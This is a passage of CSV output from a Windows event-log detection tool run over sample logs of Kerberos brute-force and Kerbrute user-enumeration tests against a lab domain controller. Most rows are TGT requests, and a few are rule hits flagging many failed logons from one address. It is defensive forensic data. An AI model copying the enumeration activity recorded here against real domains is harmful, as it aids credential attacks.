::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.308 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.311 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.338 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.338 +00:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_25e3b4425ffd47aab/SM_b2a35e76f50a4c23a/SM_957258b5879242afb/SM_6aaeeb113c0c4af3a/$P51000-50I28MP5JB3E/administrator/krbtgt/SM_2b6f1a51ac6c41b2a/SM_27d255b6407743b08/Guest/Administrator/SM_2f6964c8f421408ab/SM_8b9faa99d83446d1b/Test-ADM/SM_374806bcc65140a5a/DefaultAccount IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,- +2021-12-02 14:48:16.342 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:16.956 +00:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:HealthMailboxa99e1bd/svc-ata/admin-te/HealthMailboxdabf0a3/HealthMailboxe8b0d98/HealthMailbox0ab31b3/adminupn42/HealthMailbox2cfa5bd/HealthMailboxf49e2c8/HealthMailboxa935ecd/vuln_scan/HealthMailboxf7e4358/admin-hacker/domadm/HealthMailboxebdc745/HealthMailboxc9291f7/svc_adfs01/HealthMailbox9a2d0da/Svc-SQL-DB01/svc_nxlog/HealthMailboxeb3dc3f/proabcdef IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,- +2021-12-02 14:48:17.267 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.271 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.274 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.277 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.281 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.284 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.287 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.319 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.323 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.327 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.331 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.334 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.337 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.341 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.344 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.348 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.351 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.354 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.357 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.360 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.363 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.367 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.370 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.373 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.376 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.379 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.382 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.385 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.389 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.392 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.395 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.398 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.401 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.405 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.408 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.410 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.413 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.416 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.420 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.423 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.426 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.430 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.433 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:23.180 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-03 12:06:03.488 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.493 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.497 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.510 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.847 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:04.904 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:04.910 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:06.986 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.006 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.010 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.014 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.021 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: 